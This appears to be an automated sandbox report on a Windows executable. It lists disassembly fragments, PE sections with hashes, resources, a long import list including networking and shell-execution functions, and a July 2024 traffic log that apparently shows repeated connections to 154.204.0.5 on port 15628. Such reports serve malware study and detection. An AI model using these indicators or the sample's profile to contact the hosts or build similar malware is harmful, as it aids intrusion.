dec esp
mov dword ptr [eax+18h], eax
dec eax
mov dword ptr [eax+10h], edx
push ebx
push esi
push edi
inc ecx
push esi
dec eax
sub esp, 38h
dec ecx
mov esi, ecx
dec ecx
mov ebx, eax
dec esp

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[C++] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x428198	0x190	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1ebc000	0x4a80	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1e6b000	0x2b224	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1ec1000	0x13d08	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a6eb0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x3a6f68	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3a6ed0	0x94	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x319000	0x1b90	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3178f8	0x317a00	f96ee7754d08787687b1eb505a685850	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x319000	0x11484c	0x114a00	89e108df304175c0459392c15d48ba85	False	0.27002813629688205	OpenPGP Public Key	4.903999286905515	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x42e000	0x1a3c394	0x1a30800	c7735cc98397c10354578f48a1c21fc8	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x1e6b000	0x2b224	0x2b400	923a6ca7e6cc856db44c051a9228bdf4	False	0.5233584718208093	data	6.410379575227654	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gfids	0x1e97000	0x22bb4	0x22c00	674d0626bad3418c0043bbd12f7872de	False	0.2880999887589928	data	4.244986681070948	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.giats	0x1eba000	0x1c	0x200	f76e34f2fc47f018fdb8d0c8fc6074e8	False	0.0703125	data	0.26789873110924267	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x1ebb000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1ebc000	0x4a80	0x4c00	14636b9c17349a42f567635fadf5ce88	False	0.31522409539473684	data	4.063863153985283	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1ec1000	0x13d08	0x13e00	ff4e7e6ea58930397f774fdfbd06cde2	False	0.09371314858490566	data	5.449056424193202	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x1ebe598	0x2	data	Chinese	China	5.0
RT_CURSOR	0x1ebe5a0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	Chinese	China	0.4805194805194805
RT_CURSOR	0x1ebe6d8	0xb4	Targa image data - Map 32 x 65536 x 1 +16 "\001"	Chinese	China	0.7
RT_CURSOR	0x1ebe7b8	0x134	AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Chinese	China	0.36363636363636365
RT_CURSOR	0x1ebe908	0x134	Targa image data - RLE 64 x 65536 x 1 +32 "\001"	Chinese	China	0.35714285714285715
RT_CURSOR	0x1ebea58	0x134	data	Chinese	China	0.37337662337662336
RT_CURSOR	0x1ebeba8	0x134	data	Chinese	China	0.37662337662337664
RT_CURSOR	0x1ebecf8	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Chinese	China	0.36688311688311687
RT_CURSOR	0x1ebee48	0x134	Targa image data 64 x 65536 x 1 +32 "\001"	Chinese	China	0.37662337662337664
RT_CURSOR	0x1ebef98	0x134	Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"	Chinese	China	0.36688311688311687
RT_CURSOR	0x1ebf0e8	0x134	Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"	Chinese	China	0.38636363636363635
RT_CURSOR	0x1ebf238	0x134	data	Chinese	China	0.44155844155844154
RT_CURSOR	0x1ebf388	0x134	data	Chinese	China	0.4155844155844156
RT_CURSOR	0x1ebf4d8	0x134	AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd	Chinese	China	0.5422077922077922
RT_CURSOR	0x1ebf628	0x134	data	Chinese	China	0.2662337662337662
RT_CURSOR	0x1ebf778	0x134	data	Chinese	China	0.2824675324675325
RT_CURSOR	0x1ebf8c8	0x134	data	Chinese	China	0.3246753246753247
RT_BITMAP	0x1ebfb38	0xb8	Device independent bitmap graphic, 12 x 10 x 4, image size 80	Chinese	China	0.44565217391304346
RT_BITMAP	0x1ebfbf0	0x144	Device independent bitmap graphic, 33 x 11 x 4, image size 220	Chinese	China	0.37962962962962965
RT_ICON	0x1ebcc40	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1536	Chinese	China	0.19939024390243903
RT_ICON	0x1ebd2a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688	Chinese	China	0.3699360341151386
RT_DIALOG	0x1ebe178	0x80	data	Chinese	China	0.6875
RT_DIALOG	0x1ebe1f8	0xb8	data	Chinese	China	0.6032608695652174
RT_DIALOG	0x1ebe2b0	0xa4	data	Chinese	China	0.7317073170731707
RT_DIALOG	0x1ebe358	0x15c	data	Chinese	China	0.5114942528735632
RT_DIALOG	0x1ebfa18	0xe2	data	Chinese	China	0.6769911504424779
RT_DIALOG	0x1ebfb00	0x34	data	Chinese	China	0.8653846153846154
RT_STRING	0x1ebfd38	0x5c	data	Chinese	China	0.8369565217391305
RT_STRING	0x1ebfd98	0x4e	data	Chinese	China	0.8461538461538461
RT_STRING	0x1ebfde8	0x2c	data	Chinese	China	0.5909090909090909
RT_STRING	0x1ebfe18	0x84	data	Chinese	China	0.9166666666666666
RT_STRING	0x1ebfea0	0x1cc	data	Chinese	China	0.7934782608695652
RT_STRING	0x1ec01c8	0x14e	data	Chinese	China	0.5179640718562875
RT_STRING	0x1ec00b8	0x10e	data	Chinese	China	0.7037037037037037
RT_STRING	0x1ec0658	0x50	data	Chinese	China	0.7125
RT_STRING	0x1ec0070	0x44	data	Chinese	China	0.6764705882352942
RT_STRING	0x1ec05c8	0x68	data	Chinese	China	0.7019230769230769
RT_STRING	0x1ec0318	0x1b2	data	Chinese	China	0.6474654377880185
RT_STRING	0x1ec04d0	0xf4	data	Chinese	China	0.6065573770491803
RT_STRING	0x1ec0630	0x24	data	Chinese	China	0.4722222222222222
RT_STRING	0x1ec06a8	0x1a8	data	Chinese	China	0.6674528301886793
RT_GROUP_CURSOR	0x1ebe790	0x22	Lotus unknown worksheet or configuration, revision 0x2	Chinese	China	1.0294117647058822
RT_GROUP_CURSOR	0x1ebef80	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1ebe8f0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1ebee30	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1ebece0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1ebf610	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1ebeb90	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1ebf220	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1ebea40	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1ebf0d0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1ebf370	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1ebf4c0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1ebf760	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1ebf8b0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_CURSOR	0x1ebfa00	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China	1.3
RT_GROUP_ICON	0x1ebe150	0x22	data	Chinese	China	1.0588235294117647
RT_VERSION	0x1ebe4b8	0xdc	data	Chinese	China	0.6545454545454545
RT_MANIFEST	0x1ec0850	0x22f	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (499), with CRLF line terminators	English	United States	0.5295169946332737

Imports

DLL	Import
KERNEL32.dll	GetEnvironmentStringsW, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindFirstFileExA, GetDriveTypeW, SetFilePointerEx, ReadConsoleW, GetConsoleMode, GetConsoleCP, GetTimeZoneInformation, EnumSystemLocalesW, IsValidLocale, LCMapStringW, GetTimeFormatW, GetDateFormatW, GetStringTypeW, GetStdHandle, FreeEnvironmentStringsW, QueryPerformanceFrequency, GetFullPathNameW, GetFileType, SetStdHandle, HeapQueryInformation, GetCommandLineW, GetCommandLineA, FreeLibraryAndExitThread, ExitThread, CreateThread, VirtualQuery, VirtualAlloc, GetSystemInfo, InterlockedFlushSList, InterlockedPushEntrySList, RtlPcToFileHeader, RtlUnwindEx, OutputDebugStringW, SetEnvironmentVariableA, SetEnvironmentVariableW, WriteConsoleW, SetConsoleCtrlHandler, SetCurrentDirectoryW, GetCurrentDirectoryW, InitializeSListHead, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetStartupInfoW, IsDebuggerPresent, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, CreateEventW, WaitForSingleObjectEx, ResetEvent, LocalUnlock, LocalLock, GetUserDefaultLCID, ReplaceFileA, GetDiskFreeSpaceA, Sleep, SearchPathA, GetProfileIntA, GetTempFileNameA, GetTempPathA, GetTickCount, SetErrorMode, FindResourceExW, VerifyVersionInfoA, VerSetConditionMask, GetWindowsDirectoryA, GetCurrentDirectoryA, FindNextFileA, SetFileTime, SetFileAttributesA, LocalFileTimeToFileTime, GetFileTime, GetFileSizeEx, GetFileAttributesExA, GetFileAttributesA, FileTimeToLocalFileTime, GetStringTypeExA, GetVolumeInformationA, MoveFileA, lstrcmpiA, GetShortPathNameA, LoadLibraryExA, GetCurrentProcess, DuplicateHandle, UnlockFile, SetFilePointer, SetEndOfFile, ReadFile, LockFile, GetFullPathNameA, GetFileSize, FlushFileBuffers, FindFirstFileA, FindClose, DeleteFileA, GetCPInfo, GetOEMCP, VirtualProtect, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetLocaleInfoW, CompareStringW, lstrcpyA, GetACP, GlobalFlags, GetThreadLocale, SystemTimeToFileTime, GetAtomNameA, LocalReAlloc, GlobalHandle, GlobalReAlloc, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSection, WritePrivateProfileStringA, GetPrivateProfileStringA, GetPrivateProfileIntA, GetModuleHandleA, lstrcmpA, GetVersionExA, GetCurrentThread, ResumeThread, SuspendThread, SetThreadPriority, CreateEventA, WaitForSingleObject, SetEvent, FileTimeToSystemTime, SystemTimeToTzSpecificLocalTime, LocalAlloc, GetModuleFileNameA, GetCurrentProcessId, CompareStringA, GlobalGetAtomNameA, GlobalFindAtomA, GlobalAddAtomA, FindResourceA, lstrcmpW, GlobalDeleteAtom, LoadLibraryExW, GetModuleHandleW, FreeResource, FreeLibrary, GetSystemDirectoryW, GetCurrentThreadId, EncodePointer, LeaveCriticalSection, EnterCriticalSection, QueryActCtxW, FindActCtxSectionStringW, DeactivateActCtx, ActivateActCtx, CreateActCtxW, LoadLibraryW, GetModuleHandleExW, GetModuleFileNameW, LockResource, OutputDebugStringA, CopyFileA, FormatMessageA, MulDiv, LocalFree, GlobalFree, GlobalUnlock, GlobalLock, GlobalSize, GlobalAlloc, SetLastError, CreateFileA, LoadLibraryA, lstrcatA, CloseHandle, WriteFile, GetProcAddress, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, RaiseException, GetProcessHeap, HeapSize, HeapFree, HeapReAlloc, HeapAlloc, HeapDestroy, DecodePointer, GetLastError, WideCharToMultiByte, MultiByteToWideChar, FindResourceW, SizeofResource, LoadResource, ExitProcess, CreateFileW
USER32.dll	IsRectEmpty, SetRect, InvalidateRgn, CopyAcceleratorTableA, CharNextA, LoadCursorW, WindowFromPoint, ReleaseCapture, SetCapture, DeleteMenu, CharUpperA, GetDialogBaseUnits, GetAsyncKeyState, CopyImage, LoadImageW, DestroyIcon, InvalidateRect, TrackMouseEvent, RealChildWindowFromPoint, IntersectRect, LoadCursorA, GetSysColorBrush, SystemParametersInfoA, InflateRect, GetMenuItemInfoA, DestroyMenu, MapDialogRect, SetWindowContextHelpId, SetCursor, ShowOwnedPopups, PostQuitMessage, GetCursorPos, TranslateMessage, GetMessageA, WaitMessage, GetWindowThreadProcessId, GetDesktopWindow, GetActiveWindow, GetNextDlgTabItem, EndDialog, CreateDialogIndirectParamA, FillRect, ClientToScreen, GetWindowDC, TabbedTextOutA, GrayStringA, DrawTextExA, DrawTextA, GetMonitorInfoA, MonitorFromWindow, WinHelpA, GetScrollInfo, SetScrollInfo, LoadIconA, CallNextHookEx, SetWindowsHookExA, GetLastActivePopup, GetTopWindow, GetClassNameA, GetClassLongPtrA, GetClassLongA, SetWindowLongPtrA, GetWindowLongPtrA, PtInRect, EqualRect, GetSysColor, GetNextDlgGroupItem, ScreenToClient, AdjustWindowRectEx, RemovePropA, GetPropA, SetPropA, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, RedrawWindow, ValidateRect, EndPaint, BeginPaint, SetForegroundWindow, GetForegroundWindow, SetActiveWindow, TrackPopupMenuEx, TrackPopupMenu, IsZoomed, GetMenu, GetCapture, GetKeyState, IsWindowVisible, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, DestroyWindow, IsChild, IsMenu, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, CallWindowProcA, DefWindowProcA, GetMessageTime, GetMessagePos, LoadMenuW, BringWindowToTop, SetCursorPos, MessageBoxA, SendMessageA, PostMessageA, SetTimer, KillTimer, PeekMessageA, DispatchMessageA, RegisterWindowMessageA, IsDialogMessageA, GetWindow, SetWindowLongA, GetWindowLongA, GetWindowTextLengthA, GetWindowTextA, SetWindowTextA, ScrollWindowEx, IsWindowEnabled, SetFocus, GetDlgCtrlID, IsDlgButtonChecked, CheckRadioButton, MessageBeep, DrawFocusRect, LoadImageA, DrawIconEx, GetIconInfo, EnableScrollBar, HideCaret, InvertRect, NotifyWinEvent, CreatePopupMenu, GetMenuDefaultItem, SetLayeredWindowAttributes, EnumDisplayMonitors, SetClassLongPtrA, SetWindowRgn, CheckDlgButton, GetDlgItemTextA, SetParent, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, DrawStateA, DrawEdge, MapWindowPoints, DrawFrameControl, EnableWindow, UpdateWindow, GetWindowRect, LoadIconW, UnregisterClassA, IsIconic, GetSystemMetrics, GetSystemMenu, AppendMenuA, DrawIcon, GetClientRect, GetMenuStringA, GetMenuState, GetSubMenu, GetMenuItemID, GetMenuItemCount, InsertMenuA, RemoveMenu, UnhookWindowsHookEx, IsWindow, GetKeyNameTextA, MapVirtualKeyA, GetDC, ReleaseDC, UnpackDDElParam, CopyRect, SendDlgItemMessageA, SetRectEmpty, OffsetRect, GetParent, GetFocus, CheckMenuItem, EnableMenuItem, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, SetMenuItemInfoA, LoadBitmapW, ShowWindow, MoveWindow, SetWindowPos, GetDlgItem, SetDlgItemInt, GetDlgItemInt, SetDlgItemTextA, CopyIcon, FrameRect, LoadAcceleratorsA, TranslateAcceleratorA, LoadMenuA, InsertMenuItemA, GetMenuBarInfo, GetTabbedTextExtentW, GetTabbedTextExtentA, GetDCEx, DestroyCursor, GetWindowRgn, WindowFromDC, CreateMenu, InSendMessage, MonitorFromRect, SendNotifyMessageA, SubtractRect, TranslateMDISysAccel, DefMDIChildProcA, DefFrameProcA, DrawMenuBar, EnumChildWindows, GetUpdateRect, IsClipboardFormatAvailable, CharUpperBuffA, ModifyMenuA, GetDoubleClickTime, SetMenuDefaultItem, LockWindowUpdate, DestroyAcceleratorTable, CreateAcceleratorTableA, LoadAcceleratorsW, ToAsciiEx, GetKeyboardState, MapVirtualKeyExA, IsCharLowerA, GetKeyboardLayout, PostThreadMessageA, GetComboBoxInfo, MonitorFromPoint, UpdateLayeredWindow, UnionRect, RegisterClipboardFormatA, ReuseDDElParam, SetMenu
GDI32.dll	DeleteObject, Escape, ExcludeClipRect, GetClipBox, GetClipRgn, GetCurrentPositionEx, GetObjectType, GetPixel, GetStockObject, GetViewportExtEx, GetWindowExtEx, IntersectClipRect, LineTo, OffsetClipRgn, PlayMetaFile, PtVisible, RestoreDC, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkMode, SetMapperFlags, SetGraphicsMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetStretchBltMode, SetTextCharacterExtra, SetTextAlign, SetTextJustification, PlayMetaFileRecord, EnumMetaFile, SetWorldTransform, ModifyWorldTransform, SetColorAdjustment, StartDocA, ArcTo, PolyDraw, SelectClipPath, SetArcDirection, ExtCreatePen, MoveToEx, TextOutA, ExtTextOutA, PolyBezierTo, PolylineTo, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, CreateFontIndirectA, GetTextExtentPoint32A, CombineRgn, CreateSolidBrush, SetRectRgn, DPtoLP, GetTextMetricsA, GetBkColor, GetTextColor, GetRgnBox, CreatePalette, GetNearestPaletteIndex, GetPaletteEntries, GetSystemPaletteEntries, RealizePalette, CreateCompatibleBitmap, CreateDIBitmap, EnumFontFamiliesA, GetTextCharsetInfo, GetDIBits, SetPixel, StretchBlt, CreateDIBSection, SetDIBColorTable, CreateEllipticRgn, Ellipse, CreatePolygonRgn, Polygon, Polyline, CreateRoundRectRgn, LPtoDP, EnumFontFamiliesExA, Rectangle, OffsetRgn, GetCurrentObject, CreateFontA, GetCharWidthA, StretchDIBits, RoundRect, FillRgn, FrameRgn, GetBoundsRect, PtInRegion, ExtFloodFill, SetPaletteEntries, SetPixelV, GetWindowOrgEx, GetViewportOrgEx, CloseMetaFile, CreateMetaFileA, DeleteMetaFile, EndDoc, StartPage, EndPage, AbortDoc, SetAbortProc, GetROP2, GetBkMode, GetNearestColor, GetPolyFillMode, GetStretchBltMode, GetTextAlign, GetTextExtentPointA, GetTextExtentPoint32W, GetTextFaceA, CreateRectRgn, CreatePatternBrush, CreatePen, CreateHatchBrush, CreateDIBPatternBrushPt, CreateCompatibleDC, BitBlt, GetObjectA, SetTextColor, SetBkColor, CreateBitmap, DeleteDC, PatBlt, CreateRectRgnIndirect, GetDeviceCaps, CreateDCA, GetMapMode, RectVisible, CopyMetaFileA
MSIMG32.dll	TransparentBlt, AlphaBlend
WINSPOOL.DRV	ClosePrinter, GetJobA, OpenPrinterA, DocumentPropertiesA
ADVAPI32.dll	RegEnumKeyA, GetFileSecurityA, SetFileSecurityA, RegEnumKeyExA, RegEnumValueA, RegOpenKeyExW, RegQueryValueA, RegCloseKey, RegSetValueExA, RegDeleteValueA, RegDeleteKeyA, RegCreateKeyExA, RegQueryValueExA, RegOpenKeyExA, RegSetValueA
SHELL32.dll	SHBrowseForFolderA, SHGetFileInfoA, SHAddToRecentDocs, ExtractIconA, ShellExecuteA, SHGetPathFromIDListA, SHGetSpecialFolderLocation, SHGetDesktopFolder, ShellExecuteExA, SHAppBarMessage, SHGetSpecialFolderPathA, SHGetMalloc, DragFinish, DragQueryFileA
COMCTL32.dll	ImageList_ReplaceIcon
SHLWAPI.dll	PathFindExtensionA, PathFindFileNameA, PathRemoveExtensionA, PathIsUNCA, PathStripToRootA, StrFormatKBSizeA, UrlUnescapeA, PathRemoveFileSpecW
UxTheme.dll	GetThemeColor, GetThemePartSize, GetThemeSysColor, DrawThemeText, DrawThemeParentBackground, OpenThemeData, CloseThemeData, DrawThemeBackground, GetCurrentThemeName, IsThemeBackgroundPartiallyTransparent, GetWindowTheme, IsAppThemed
ole32.dll	OleFlushClipboard, OleIsCurrentClipboard, DoDragDrop, OleGetClipboard, CoLockObjectExternal, RegisterDragDrop, RevokeDragDrop, PropVariantCopy, CoRegisterClassObject, CoRevokeClassObject, CoRegisterMessageFilter, OleSetMenuDescriptor, OleLockRunning, StgCreateDocfile, StgOpenStorage, StgIsStorageFile, CreateFileMoniker, OleCreateMenuDescriptor, OleDestroyMenuDescriptor, OleTranslateAccelerator, IsAccelerator, OleRegGetMiscStatus, OleRegEnumVerbs, CreateGenericComposite, CreateItemMoniker, WriteClassStm, OleCreate, OleCreateFromData, OleUninitialize, OleInitialize, CoFreeUnusedLibraries, OleRun, OleCreateLinkFromData, OleCreateStaticFromData, CoInitializeEx, CreateStreamOnHGlobal, CreateILockBytesOnHGlobal, StgOpenStorageOnILockBytes, StgCreateDocfileOnILockBytes, CoGetClassObject, CoDisconnectObject, StringFromGUID2, CLSIDFromProgID, CLSIDFromString, CoInitialize, CoCreateInstance, CoCreateGuid, CoUninitialize, SetConvertStg, ReleaseStgMedium, OleDuplicateData, ReadFmtUserTypeStg, WriteFmtUserTypeStg, WriteClassStg, ReadClassStg, CreateBindCtx, CoTreatAsClass, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID, OleCreateLinkToFile, OleCreateFromFile, OleLoad, OleSave, OleSaveToStream, OleSetContainedObject, OleGetIconOfClass, GetHGlobalFromILockBytes, CreateDataAdviseHolder, CreateOleAdviseHolder, GetRunningObjectTable, OleIsRunning, CoGetMalloc, OleQueryLinkFromData, OleQueryCreateFromData, OleSetClipboard, OleRegGetUserType
OLEAUT32.dll	LoadRegTypeLib, RegisterTypeLib, SysStringLen, SysReAllocStringLen, SystemTimeToVariantTime, VariantTimeToSystemTime, SafeArrayAllocDescriptor, SafeArrayAllocData, SafeArrayCreate, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayDestroy, SafeArrayRedim, SafeArrayGetDim, SafeArrayGetElemsize, SafeArrayGetUBound, SafeArrayGetLBound, LoadTypeLib, SafeArrayUnlock, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayGetElement, SafeArrayPutElement, SafeArrayCopy, SafeArrayPtrOfIndex, VariantCopy, VarDateFromStr, VarCyFromStr, VarBstrFromCy, VarBstrFromDate, VarBstrFromDec, VarDecFromStr, OleCreateFontIndirect, SysAllocString, VariantChangeType, VariantClear, SysAllocStringLen, VariantInit, SysAllocStringByteLen, SysStringByteLen, SafeArrayLock, SysFreeString
oledlg.dll
WS2_32.dll	send, sendto, socket, gethostbyname, WSAStartup, WSACleanup, WSASetLastError, WSAGetLastError, WSAAsyncSelect, setsockopt, accept, bind, closesocket, connect, getpeername, getsockname, htonl, htons, inet_addr, ntohs, recv, recvfrom, select, inet_ntoa
gdiplus.dll	GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromScan0, GdipBitmapLockBits, GdipBitmapUnlockBits, GdipDeleteGraphics, GdipDrawImageI, GdipCreateBitmapFromHBITMAP, GdipCreateFromHDC, GdipSetInterpolationMode, GdipDrawImageRectI, GdipCreateBitmapFromFile, GdipCreateBitmapFromStream, GdipGetImagePaletteSize, GdipGetImagePalette, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipGetImageGraphicsContext, GdipDisposeImage, GdipCloneImage, GdiplusStartup, GdipFree, GdipAlloc, GdiplusShutdown, GdipCreateBitmapFromFileICM
OLEACC.dll	AccessibleObjectFromWindow, LresultFromObject, CreateStdAccessibleObject
WININET.dll	InternetGetLastResponseInfoA, InternetQueryDataAvailable, InternetSetOptionA, InternetQueryOptionA, InternetFindNextFileA, InternetErrorDlg, InternetGetCookieA, InternetSetCookieA, HttpQueryInfoA, HttpEndRequestA, HttpSendRequestExA, HttpSendRequestA, HttpAddRequestHeadersA, HttpOpenRequestA, GopherGetAttributeA, GopherOpenFileA, GopherFindFirstFileA, GopherCreateLocatorA, FtpCommandA, FtpGetCurrentDirectoryA, FtpSetCurrentDirectoryA, FtpRemoveDirectoryA, FtpCreateDirectoryA, FtpOpenFileA, FtpRenameFileA, FtpDeleteFileA, FtpPutFileA, FtpGetFileA, FtpFindFirstFileA, InternetCrackUrlA, InternetCanonicalizeUrlA, InternetWriteFile, InternetSetFilePointer, InternetReadFile, InternetOpenUrlA, InternetConnectA, InternetCloseHandle, InternetOpenA, InternetSetStatusCallback
IMM32.dll	ImmGetContext, ImmGetOpenStatus, ImmReleaseContext
WINMM.dll	PlaySoundA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 20, 2024 16:30:02.795403004 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:30:03.528764009 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:30:03.528867960 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:30:03.530131102 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:30:03.535979986 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:30:04.470690966 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:30:04.520759106 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:30:04.683377028 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:30:04.691657066 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:30:05.005399942 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:30:05.046889067 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:30:35.083883047 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:30:35.088984013 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:30:40.629980087 CEST	49728	80	192.168.2.6	54.251.31.103
Jul 20, 2024 16:30:40.634964943 CEST	80	49728	54.251.31.103	192.168.2.6
Jul 20, 2024 16:30:40.635068893 CEST	49728	80	192.168.2.6	54.251.31.103
Jul 20, 2024 16:30:40.657933950 CEST	49728	80	192.168.2.6	54.251.31.103
Jul 20, 2024 16:30:40.662818909 CEST	80	49728	54.251.31.103	192.168.2.6
Jul 20, 2024 16:30:41.421272993 CEST	49729	53	192.168.2.6	8.8.8.8
Jul 20, 2024 16:30:41.424561977 CEST	49730	443	192.168.2.6	103.235.47.188
Jul 20, 2024 16:30:41.424608946 CEST	443	49730	103.235.47.188	192.168.2.6
Jul 20, 2024 16:30:41.424882889 CEST	49730	443	192.168.2.6	103.235.47.188
Jul 20, 2024 16:30:41.424882889 CEST	49730	443	192.168.2.6	103.235.47.188
Jul 20, 2024 16:30:41.425112009 CEST	443	49730	103.235.47.188	192.168.2.6
Jul 20, 2024 16:30:41.425311089 CEST	49730	443	192.168.2.6	103.235.47.188
Jul 20, 2024 16:30:41.426507950 CEST	53	49729	8.8.8.8	192.168.2.6
Jul 20, 2024 16:30:41.426592112 CEST	49729	53	192.168.2.6	8.8.8.8
Jul 20, 2024 16:30:41.430872917 CEST	49731	443	192.168.2.6	77.88.55.88
Jul 20, 2024 16:30:41.430897951 CEST	443	49731	77.88.55.88	192.168.2.6
Jul 20, 2024 16:30:41.430999994 CEST	49731	443	192.168.2.6	77.88.55.88
